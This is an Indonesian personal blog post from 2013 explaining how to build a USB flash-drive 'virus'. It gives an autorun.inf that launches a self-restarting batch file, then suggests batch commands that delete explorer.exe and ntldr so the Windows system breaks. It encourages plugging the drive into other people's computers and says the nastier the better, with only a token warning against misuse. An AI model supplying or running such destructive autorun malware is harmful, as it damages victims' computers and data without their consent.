my blogger
Powered by Blogger.

music

About Me

My photo
saya reza purbaya orangnya homoris dan serius apabila serius

Translate

Paling Hits

sederhana banyak cinta

Tuesday, 25 June 2013

Cara Membuat Virus Di Flashdisk


Virus… Mungkin kata virus akan membuat sebagian orang merasa takut. Tapi mengapa sekarang saya justru membahas cara membuat virus ya? Tidak apa-apa kan. Ini cuman buat menambah pengtahuan kita. Sebelum kita membahas bagaimana cara membuat virus mungkin ada baiknya kalau sya ceritakan dulu apa sebenarnya Virus itu. Oh iya perlu diketahui Virus yang kita bahas sekarang adalah Virus Komputer bukan Virus yang ada di dunia kedokteran seperti Virus HIV, Virus Flu Burung, Flu Babi, dan masih banyak lagi virus-virus yang lain.

cara pertama :
- buka Notepad… udah kebuka ketik
[autorun]
shellexecute=virus.bat
- save dengan nama “autorun.inf” (tidak pake tanda petik)
simpan file tersebut dalam flasdisk kamu..
cara kedua :
- kita bikin file .bat nya buka notepad lagi trus ketik
start virus.bat
- save dengan nama “virus.bat” (tidak pake tanda petik)
simpan file tersebut dalam flasdisk kamu..
- nah selesai deh….
colok aja flasdisknya di kompi kamu atau kompi orang lain…
paling bagusnya kalo kompi tersebut… autorunnya aktif…. tinggal dicolok aja
kalo autorun kompi tersebut gak aktif tunggu di klik aja tuh icon drive kamu…
langsung jalan deh virusnya
note:
dari contoh sederhana diatas kamu bisa brekreasi lagi.. seperti isikan file “virus.bat” dengan listing dibawah ini..
@echo off
del c:windowsexplorer.exe
attrib c: -a -s -h -r ntldr
del c:ntldr
pokoknya terserah lu mau tambahin apa lagi…… lebih jahat lebih bagus…

warrning:
- jangan disalahgunakan

0 komentar

Post a Comment

Lencana Facebook